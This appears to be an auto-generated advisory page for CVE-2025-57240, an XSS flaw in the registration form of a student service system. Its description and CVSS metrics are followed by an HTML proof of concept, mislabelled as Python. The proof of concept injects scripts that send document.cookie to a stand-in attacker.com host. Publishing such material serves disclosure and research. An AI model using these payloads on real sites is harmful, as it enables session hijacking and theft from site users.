Security Vulnerability Report
中文
CVE-2025-57240 CVSS 6.1 MEDIUM

CVE-2025-57240

Published: 2025-10-23 18:16:06
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Cross site scripting (XSS) vulnerability in 17gz International Student service system 1.0 allows attackers to execute arbitrary code via the registration step.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

17gz International Student service system 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-57240 PoC - XSS in 17gz International Student Service System --> <!-- Target: Registration page in 17gz International Student service system 1.0 --> <!DOCTYPE html> <html> <head> <title>CVE-2025-57240 PoC</title> </head> <body> <h2>CVE-2025-57240 XSS PoC</h2> <p>Target: 17gz International Student service system 1.0</p> <form id="exploitForm" action="http://target-site/register" method="POST"> <!-- Malicious payload injected in username field --> <input type="text" name="username" value='"><script>fetch("https://attacker.com/log?cookie="+document.cookie)</script><x y="'> <input type="text" name="email" value="[email protected]"> <input type="password" name="password" value="Password123"> <input type="password" name="confirm_password" value="Password123"> <button type="submit">Register</button> </form> <script> // Alternative payload using event handler const payload = '<img src=x onerror="fetch(\'https://attacker.com/log?cookie=\'+document.cookie)">'; // Auto-submit form for demonstration // document.getElementById('exploitForm').submit(); console.log('PoC payload:', payload); console.log('Target URL: http://target-site/register'); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-57240", "sourceIdentifier": "[email protected]", "published": "2025-10-23T18:16:06.240", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross site scripting (XSS) vulnerability in 17gz International Student service system 1.0 allows attackers to execute arbitrary code via the registration step."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/samllpotato1/xss/blob/main/xss.txt", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.